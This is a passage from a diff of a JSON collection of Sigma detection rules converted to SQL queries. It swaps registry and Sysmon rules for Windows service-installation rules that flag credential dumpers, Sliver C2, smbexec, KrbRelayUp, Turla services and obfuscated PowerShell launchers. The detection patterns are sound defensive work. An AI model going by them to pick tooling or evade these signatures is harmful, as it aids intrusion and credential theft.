logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ - "attack.defense_evasion", + "attack.lateral_movement", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "status": "experimental", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055.012" - ], - "falsepositives": [ - "There are no known false positives at this time" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" - ], - "filename": "sysmon_process_hollowing.yml" - }, - { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.t1543" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + 